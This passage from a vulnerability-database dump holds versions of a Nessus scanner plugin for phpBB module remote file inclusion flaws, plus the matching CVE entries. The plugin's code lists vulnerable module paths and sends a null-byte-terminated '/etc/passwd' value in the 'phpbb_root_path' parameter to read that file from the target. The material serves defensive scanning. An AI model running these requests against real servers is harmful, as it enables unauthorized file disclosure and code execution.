\"/includes/functions_user_viewed_posts.php\";\n# - AI chat (included in PlusXL)\nmod[nmods++] = \"/mods/iai/includes/constants.php\";\n# - Import Tools - Members\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Insert User\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Journals System\nmod[nmods++] = \"/includes/journals_delete.php\";\nmod[nmods++] = \"/includes/journals_edit.php\";\nmod[nmods++] = \"/includes/journals_post.php\";\n# - phpBB auction\nmod[nmods++] = \"/auction/auction_common.php\";\n# - phpBB Search Engine Indexer\nmod[nmods++] = \"/includes/archive/archive_topic.php\";\n# - phpBB Security\nmod[nmods++] = \"/includes/phpbb_security.php\";\n# - phpBB2 Plus (not really a mod)\nmod[nmods++] = \"/language/lang_german/lang_main_album.php\";\nmod[nmods++] = \"/language/lang_german/lang_admin_album.php\";\nmod[nmods++] = \"/language/lang_english/lang_main_album.php\";\nmod[nmods++] = \"/language/lang_english/lang_admin_album.php\";\n# - PlusXL itself\nmod[nmods++] = \"/includes/functions.php\";\n# - 
SpamBlockerMod\nmod[nmods++] = \"/includes/antispam.php\";\n\n\ninfo = \"\";\ncontents = \"\";\n\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/phpBB\"));\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches)) {\n dir = matches[2];\n\n # Try to exploit the flaw to read a file.\n file = \"/etc/passwd%00\";\n for (i=0; i<nmods; i++)\n {\n r = http_send_recv3(method:\"GET\", \n item:string(\n dir, mod[i], \"?\",\n \"phpbb_root_path=\", file\n ), \n port:port\n );\n if (isnull(r)) exit(0);\n res = r[2];\n\n # There's a problem if...\n if (\n # there's an entry for root or...\n egrep(pattern:\"root:.*:0:[01]:\", string:res) ||\n # we get an error saying \"failed to open stream\".\n egrep(pattern:\"main\\(/etc/passwd\\\\0.+ failed to open stream\", string:res) ||\n # we get an error claiming the file doesn't exist or...\n egrep(pattern:\"main\\(/etc/passwd\\).*: failed to open stream: No such file or directory\", string:res) ||\n # we get an error about open_basedir restriction.\n egrep(pattern:\"main.+ open_basedir restriction in effect. 
File\\(/etc/passwd\", string:res)\n )\n {\n info = info +\n \" \" + dir + mod[i] + '\\n';\n\n if (!contents && egrep(string:res, pattern:\"root:.*:0:[01]:\"))\n contents = res - strstr(res, \"<br\");\n\n if (!thorough_tests) break;\n }\n }\n}\n\nif (info)\n{\n if (contents)\n info = string(\n info,\n \"\\n\",\n \"And here are the contents of the file '/etc/passwd' that Nessus\\n\",\n \"was able to read from the remote host :\\n\",\n \"\\n\",\n contents\n );\n\n report = string(\n \"The following scripts(s) are vulnerable :\\n\",\n \"\\n\",\n info\n );\n\n security_warning(port:port, extra:report);\n}\n", "title": "phpBB Multiple Module phpbb_root_path Parameter Remote File Inclusion", "type": "nessus", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 4, "lastseen": "2017-10-29T13:41:28"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:phpbb_group:phpbb-auction"], "cvelist": ["CVE-2006-7090", "CVE-2006-5301", "CVE-2006-5418", "CVE-2006-7100", "CVE-2007-5009", "CVE-2006-5390", "CVE-2006-7147", "CVE-2006-2245", "CVE-2007-5100", "CVE-2006-5306"], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "The remote host contains a third-party module for phpBB. \n\nThe version of at least one such component or module installed on the remote host fails to sanitize input to the 'phpbb_root_path' parameter before using it to include PHP code. 
Provided PHP's 'register_globals' setting is enabled, an unauthenticated attacker may be able to exploit these flaws to view arbitrary files on the remote host or to execute arbitrary PHP code, possibly taken from third-party hosts.", "edition": 5, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "944bafa91d9432dac58c508a084f784a0f1657723d5389075de9f35a6932d2a4", "hashmap": [{"hash": "cd1acb6332b705efcfb274e39bdce0d5", "key": "title"}, {"hash": "fed7aede4a5f01a9fc080184a2dd8da8", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "eb7c1eabb2baa803f2635d2ba4792d3f", "key": "pluginID"}, {"hash": "54763aeea4128585b660ca7c17280d48", "key": "modified"}, {"hash": "69db04a1c80dd4a176e4f3d53561e805", "key": "cvelist"}, {"hash": "482eb5449b320af2330c92508b5a67b7", "key": "sourceData"}, {"hash": "b8ec7988b9627a83f1d82122e582413e", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "8b5dc20b319b47100bd63d45b155e50c", "key": "published"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "65920404be9df979f281f296ff035289", "key": "cpe"}, {"hash": "9acce4448de96d820472fbc896512e35", "key": "href"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=21323", "id": "PHPBB_AUCTION_PHPBB_ROOT_PATH_FILE_INCLUDE.NASL", "lastseen": "2018-05-17T12:45:20", "modified": "2018-05-16T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "21323", "published": "2006-05-04T00:00:00", "references": ["http://www.securityfocus.com/archive/1/479997/30/0/threaded", "http://www.nessus.org/u?9640ab6a", "http://www.phpbb.com/phpBB/viewtopic.php?p=2504370&highlight=#2504370", "http://www.nessus.org/u?37fd2995", "http://seclists.org/bugtraq/2006/Oct/209", 
"http://www.securityfocus.com/archive/1/452012/30/0/threaded"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21323);\n script_version(\"1.38\");\n\n script_cve_id(\n \"CVE-2006-2245\",\n \"CVE-2006-5301\",\n \"CVE-2006-5306\",\n \"CVE-2006-5390\",\n \"CVE-2006-5418\",\n \"CVE-2006-7090\",\n \"CVE-2006-7100\",\n \"CVE-2006-7147\",\n \"CVE-2007-5009\",\n \"CVE-2007-5100\"\n );\n script_bugtraq_id(\n 17822, \n 20484, \n 20485, \n 20493, \n 20501, \n 20518, \n 20525, \n 20558, \n 20571, \n 21171, \n 25737, \n 25776\n );\n script_osvdb_id(\n 25263,\n 29711,\n 29712,\n 29713,\n 29714,\n 29734,\n 29751,\n 31029,\n 35449,\n 35450,\n 38265,\n 38723,\n 38724,\n 38725\n );\n script_xref(name:\"EDB-ID\", value:\"2483\");\n script_xref(name:\"EDB-ID\", value:\"2522\");\n script_xref(name:\"EDB-ID\", value:\"2525\");\n script_xref(name:\"EDB-ID\", value:\"2533\");\n script_xref(name:\"EDB-ID\", value:\"2538\");\n\n script_name(english:\"phpBB Multiple Module phpbb_root_path Parameter Remote File Inclusion\");\n script_summary(english:\"Tries to read a local file using phpBB modules\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is prone to\nremote file include attacks.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains a third-party module for phpBB. \n\nThe version of at least one such component or module installed on the\nremote host fails to sanitize input to the 'phpbb_root_path' parameter\nbefore using it to include PHP code. 
Provided PHP's\n'register_globals' setting is enabled, an unauthenticated attacker may\nbe able to exploit these flaws to view arbitrary files on the remote\nhost or to execute arbitrary PHP code, possibly taken from third-party\nhosts.\" );\n # http://web.archive.org/web/20070527141033/http://pridels.blogspot.com/2006/05/phpbb-auction-mod-remote-file.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9640ab6a\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/bugtraq/2006/Oct/209\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpbb.com/phpBB/viewtopic.php?p=2504370&highlight=#2504370\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/452012/30/0/threaded\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/479997/30/0/threaded\" );\n # https://web.archive.org/web/20160820141912/http://www.phpbb2.de/ftopic45218.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?37fd2995\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Disable PHP's 'register_globals' setting or contact the product's\nauthor to see if an upgrade exists.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/05/04\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/05/03\");\n script_cvs_date(\"Date: 2018/05/16 19:05:10\");\n 
script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:phpbb_group:phpbb-auction\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"phpbb_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/phpBB\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Vulnerable scripts.\n# - modules\nnmods = 0;\nmod = make_array();\n# - ACP User Registration\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Admin User Viewed Posts Tracker\nmod[nmods++] = \"/includes/functions_user_viewed_posts.php\";\n# - AI chat (included in PlusXL)\nmod[nmods++] = \"/mods/iai/includes/constants.php\";\n# - Import Tools - Members\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Insert User\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Journals System\nmod[nmods++] = \"/includes/journals_delete.php\";\nmod[nmods++] = \"/includes/journals_edit.php\";\nmod[nmods++] = \"/includes/journals_post.php\";\n# - phpBB auction\nmod[nmods++] = \"/auction/auction_common.php\";\n# - phpBB Search Engine Indexer\nmod[nmods++] = \"/includes/archive/archive_topic.php\";\n# - phpBB Security\nmod[nmods++] = \"/includes/phpbb_security.php\";\n# - phpBB2 Plus (not really a mod)\nmod[nmods++] = \"/language/lang_german/lang_main_album.php\";\nmod[nmods++] = \"/language/lang_german/lang_admin_album.php\";\nmod[nmods++] = \"/language/lang_english/lang_main_album.php\";\nmod[nmods++] = \"/language/lang_english/lang_admin_album.php\";\n# - PlusXL 
itself\nmod[nmods++] = \"/includes/functions.php\";\n# - SpamBlockerMod\nmod[nmods++] = \"/includes/antispam.php\";\n\n\ninfo = \"\";\ncontents = \"\";\n\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/phpBB\"));\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches)) {\n dir = matches[2];\n\n # Try to exploit the flaw to read a file.\n file = \"/etc/passwd%00\";\n for (i=0; i<nmods; i++)\n {\n r = http_send_recv3(method:\"GET\", \n item:string(\n dir, mod[i], \"?\",\n \"phpbb_root_path=\", file\n ), \n port:port\n );\n if (isnull(r)) exit(0);\n res = r[2];\n\n # There's a problem if...\n if (\n # there's an entry for root or...\n egrep(pattern:\"root:.*:0:[01]:\", string:res) ||\n # we get an error saying \"failed to open stream\".\n egrep(pattern:\"main\\(/etc/passwd\\\\0.+ failed to open stream\", string:res) ||\n # we get an error claiming the file doesn't exist or...\n egrep(pattern:\"main\\(/etc/passwd\\).*: failed to open stream: No such file or directory\", string:res) ||\n # we get an error about open_basedir restriction.\n egrep(pattern:\"main.+ open_basedir restriction in effect. 
File\\(/etc/passwd\", string:res)\n )\n {\n info = info +\n \" \" + dir + mod[i] + '\\n';\n\n if (!contents && egrep(string:res, pattern:\"root:.*:0:[01]:\"))\n contents = res - strstr(res, \"<br\");\n\n if (!thorough_tests) break;\n }\n }\n}\n\nif (info)\n{\n if (contents)\n {\n contents = data_protection::redact_etc_passwd(output:contents);\n info = string(\n info,\n \"\\n\",\n \"And here are the contents of the file '/etc/passwd' that Nessus\\n\",\n \"was able to read from the remote host :\\n\",\n \"\\n\",\n contents\n );\n }\n report = string(\n \"The following scripts(s) are vulnerable :\\n\",\n \"\\n\",\n info\n );\n\n security_warning(port:port, extra:report);\n}\n", "title": "phpBB Multiple Module phpbb_root_path Parameter Remote File Inclusion", "type": "nessus", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 5, "lastseen": "2018-05-17T12:45:20"}], "edition": 10, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "65920404be9df979f281f296ff035289"}, {"key": "cvelist", "hash": "69db04a1c80dd4a176e4f3d53561e805"}, {"key": "cvss", "hash": "737e2591b537c46d1ca7ce6f0cea5cb9"}, {"key": "description", "hash": "82225a90448b406db9ebb27b5ec0f52a"}, {"key": "href", "hash": "9acce4448de96d820472fbc896512e35"}, {"key": "modified", "hash": "015cb78ce50d3bd4e2fbe18f25603329"}, {"key": "naslFamily", "hash": "07948b8ff59e8dda0b01012f70f00327"}, {"key": "pluginID", "hash": "eb7c1eabb2baa803f2635d2ba4792d3f"}, {"key": "published", "hash": "8b5dc20b319b47100bd63d45b155e50c"}, {"key": "references", "hash": "4d9c49a2a6a3144a40f9c20b01976545"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "f850038f28a9086139708577a2889260"}, {"key": "title", "hash": "cd1acb6332b705efcfb274e39bdce0d5"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "4d0b2fa1846c395982aaceeb3ee649b789e38f6e03090533817670db2d3d0c62", "viewCount": 0, 
"enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-7147", "CVE-2006-5306", "CVE-2006-5301", "CVE-2006-7100", "CVE-2006-7090", "CVE-2006-5418", "CVE-2007-5009", "CVE-2006-2245", "CVE-2007-5100", "CVE-2006-5390"]}, {"type": "exploitdb", "idList": ["EDB-ID:2531", "EDB-ID:2522", "EDB-ID:2525", "EDB-ID:2533", "EDB-ID:1747", "EDB-ID:2549", "EDB-ID:4434", "EDB-ID:2551"]}, {"type": "osvdb", "idList": ["OSVDB:35450", "OSVDB:29713", "OSVDB:29712", "OSVDB:31029", "OSVDB:29714", "OSVDB:29711", "OSVDB:35449", "OSVDB:25263", "OSVDB:29751", "OSVDB:38725"]}, {"type": "canvas", "idList": ["PHPBBPLUS_INCLUDE"]}], "modified": "2019-01-16T20:06:36"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21323);\n script_version(\"1.40\");\n\n script_cve_id(\n \"CVE-2006-2245\",\n \"CVE-2006-5301\",\n \"CVE-2006-5306\",\n \"CVE-2006-5390\",\n \"CVE-2006-5418\",\n \"CVE-2006-7090\",\n \"CVE-2006-7100\",\n \"CVE-2006-7147\",\n \"CVE-2007-5009\",\n \"CVE-2007-5100\"\n );\n script_bugtraq_id(\n 17822, \n 20484, \n 20485, \n 20493, \n 20501, \n 20518, \n 20525, \n 20558, \n 20571, \n 21171, \n 25737, \n 25776\n );\n script_xref(name:\"EDB-ID\", value:\"2483\");\n script_xref(name:\"EDB-ID\", value:\"2522\");\n script_xref(name:\"EDB-ID\", value:\"2525\");\n script_xref(name:\"EDB-ID\", value:\"2533\");\n script_xref(name:\"EDB-ID\", value:\"2538\");\n\n script_name(english:\"phpBB Multiple Module phpbb_root_path Parameter Remote File Inclusion\");\n script_summary(english:\"Tries to read a local file using phpBB modules\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is prone to\nremote file include attacks.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains a 
third-party module for phpBB. \n\nThe version of at least one such component or module installed on the\nremote host fails to sanitize input to the 'phpbb_root_path' parameter\nbefore using it to include PHP code. Provided PHP's\n'register_globals' setting is enabled, an unauthenticated attacker may\nbe able to exploit these flaws to view arbitrary files on the remote\nhost or to execute arbitrary PHP code, possibly taken from third-party\nhosts.\" );\n # http://web.archive.org/web/20070527141033/http://pridels.blogspot.com/2006/05/phpbb-auction-mod-remote-file.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9640ab6a\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2006/Oct/209\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.phpbb.com/community/viewtopic.php?p=2504370&highlight=#2504370\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/452012/30/0/threaded\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/479997/30/0/threaded\" );\n # https://web.archive.org/web/20160820141912/http://www.phpbb2.de/ftopic45218.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?37fd2995\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Disable PHP's 'register_globals' setting or contact the product's\nauthor to see if an upgrade exists.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94);\n 
script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/05/04\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/05/03\");\n script_cvs_date(\"Date: 2018/11/15 20:50:18\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:phpbb_group:phpbb-auction\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"phpbb_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/phpBB\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Vulnerable scripts.\n# - modules\nnmods = 0;\nmod = make_array();\n# - ACP User Registration\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Admin User Viewed Posts Tracker\nmod[nmods++] = \"/includes/functions_user_viewed_posts.php\";\n# - AI chat (included in PlusXL)\nmod[nmods++] = \"/mods/iai/includes/constants.php\";\n# - Import Tools - Members\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Insert User\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Journals System\nmod[nmods++] = \"/includes/journals_delete.php\";\nmod[nmods++] = \"/includes/journals_edit.php\";\nmod[nmods++] = \"/includes/journals_post.php\";\n# - phpBB auction\nmod[nmods++] = \"/auction/auction_common.php\";\n# - phpBB Search Engine Indexer\nmod[nmods++] = \"/includes/archive/archive_topic.php\";\n# - phpBB Security\nmod[nmods++] = \"/includes/phpbb_security.php\";\n# - phpBB2 Plus (not really a mod)\nmod[nmods++] = 
\"/language/lang_german/lang_main_album.php\";\nmod[nmods++] = \"/language/lang_german/lang_admin_album.php\";\nmod[nmods++] = \"/language/lang_english/lang_main_album.php\";\nmod[nmods++] = \"/language/lang_english/lang_admin_album.php\";\n# - PlusXL itself\nmod[nmods++] = \"/includes/functions.php\";\n# - SpamBlockerMod\nmod[nmods++] = \"/includes/antispam.php\";\n\n\ninfo = \"\";\ncontents = \"\";\n\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/phpBB\"));\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches)) {\n dir = matches[2];\n\n # Try to exploit the flaw to read a file.\n file = \"/etc/passwd%00\";\n for (i=0; i<nmods; i++)\n {\n r = http_send_recv3(method:\"GET\", \n item:string(\n dir, mod[i], \"?\",\n \"phpbb_root_path=\", file\n ), \n port:port\n );\n if (isnull(r)) exit(0);\n res = r[2];\n\n # There's a problem if...\n if (\n # there's an entry for root or...\n egrep(pattern:\"root:.*:0:[01]:\", string:res) ||\n # we get an error saying \"failed to open stream\".\n egrep(pattern:\"main\\(/etc/passwd\\\\0.+ failed to open stream\", string:res) ||\n # we get an error claiming the file doesn't exist or...\n egrep(pattern:\"main\\(/etc/passwd\\).*: failed to open stream: No such file or directory\", string:res) ||\n # we get an error about open_basedir restriction.\n egrep(pattern:\"main.+ open_basedir restriction in effect. 
File\\(/etc/passwd\", string:res)\n )\n {\n info = info +\n \" \" + dir + mod[i] + '\\n';\n\n if (!contents && egrep(string:res, pattern:\"root:.*:0:[01]:\"))\n contents = res - strstr(res, \"<br\");\n\n if (!thorough_tests) break;\n }\n }\n}\n\nif (info)\n{\n if (contents)\n {\n contents = data_protection::redact_etc_passwd(output:contents);\n info = string(\n info,\n \"\\n\",\n \"And here are the contents of the file '/etc/passwd' that Nessus\\n\",\n \"was able to read from the remote host :\\n\",\n \"\\n\",\n contents\n );\n }\n report = string(\n \"The following scripts(s) are vulnerable :\\n\",\n \"\\n\",\n info\n );\n\n security_warning(port:port, extra:report);\n}\n", "naslFamily": "CGI abuses", "pluginID": "21323", "cpe": ["cpe:/a:phpbb_group:phpbb-auction"]}
{"cve": [{"lastseen": "2017-10-11T11:06:55", "bulletinFamily": "NVD", "description": "PHP remote file inclusion vulnerability in includes/functions_mod_user.php in phpBB Import Tools Mod 0.1.4 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.", "modified": "2017-10-10T21:31:30", "published": "2007-03-07T15:19:00", "id": "CVE-2006-7147", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-7147", "title": "CVE-2006-7147", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-18T15:05:37", "bulletinFamily": "NVD", "description": "Multiple PHP remote file inclusion vulnerabilities in the Journals System module 1.0.2 (RC2) and earlier for phpBB allow remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter in (1) includes/journals_delete.php, (2) includes/journals_post.php, or (3) includes/journals_edit.php.", "modified": "2018-10-17T17:42:04", "published": "2006-10-17T11:07:00", "id": "CVE-2006-5306", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5306", "title": "CVE-2006-5306", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-10-19T11:12:33", "bulletinFamily": "NVD", "description": "PHP remote file inclusion vulnerability in includes/antispam.php in the SpamBlockerMODv 1.0.2 and earlier module for phpBB allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.", "modified": "2017-10-18T21:29:32", "published": "2006-10-17T11:07:00", "id": "CVE-2006-5301", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5301", "title": "CVE-2006-5301", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-18T15:05:39", "bulletinFamily": "NVD", "description": 
"PHP remote file inclusion vulnerability in includes/functions_mod_user.php in phpBB Insert User 0.1.2 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.", "modified": "2018-10-16T12:29:26", "published": "2007-03-03T16:19:00", "id": "CVE-2006-7100", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-7100", "title": "CVE-2006-7100", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-20T10:49:16", "bulletinFamily": "NVD", "description": "PHP remote file inclusion vulnerability in auction\\auction_common.php in Auction mod 1.3m for phpBB allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.", "modified": "2017-07-19T21:31:18", "published": "2006-05-09T06:02:00", "id": "CVE-2006-2245", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2245", "title": "CVE-2006-2245", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-29T11:21:46", "bulletinFamily": "NVD", "description": "PHP remote file inclusion vulnerability in phpbb_security.php in phpBB Security 1.0.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the php_root_path parameter.", "modified": "2017-07-28T21:29:49", "published": "2007-03-02T16:18:00", "id": "CVE-2006-7090", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-7090", "title": "CVE-2006-7090", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-18T15:05:38", "bulletinFamily": "NVD", "description": "PHP remote file inclusion vulnerability in archive/archive_topic.php in pbpbb archive for search engines (SearchIndexer) (aka phpBBSEI) for phpBB allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path 
parameter.", "modified": "2018-10-17T17:42:50", "published": "2006-10-20T10:07:00", "id": "CVE-2006-5418", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5418", "title": "CVE-2006-5418", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-09-29T14:25:31", "bulletinFamily": "NVD", "description": "PHP remote file inclusion vulnerability in language/lang_german/lang_main_album.php in phpBB Plus 1.53, and 1.53a before 20070922, allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.", "modified": "2017-09-28T21:29:27", "published": "2007-09-20T17:17:00", "id": "CVE-2007-5009", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5009", "title": "CVE-2007-5009", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-03T09:33:15", "bulletinFamily": "NVD", "description": "Multiple PHP remote file inclusion vulnerabilities in phpBB Plus 1.53, and 1.53a before 20070922, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter to (1) language/lang_german/lang_admin_album.php, (2) language/lang_english/lang_main_album.php, and (3) language/lang_english/lang_admin_album.php, different vectors than CVE-2007-5009.", "modified": "2011-03-07T22:00:04", "published": "2007-09-26T18:17:00", "id": "CVE-2007-5100", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5100", "type": "cve", "title": "CVE-2007-5100", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-10-19T11:12:34", "bulletinFamily": "NVD", "description": "PHP remote file inclusion vulnerability in includes/functions_mod_user.php in the ACP User Registration (MMW) 1.00 module for phpBB allows remote attackers to execute arbitrary PHP code 
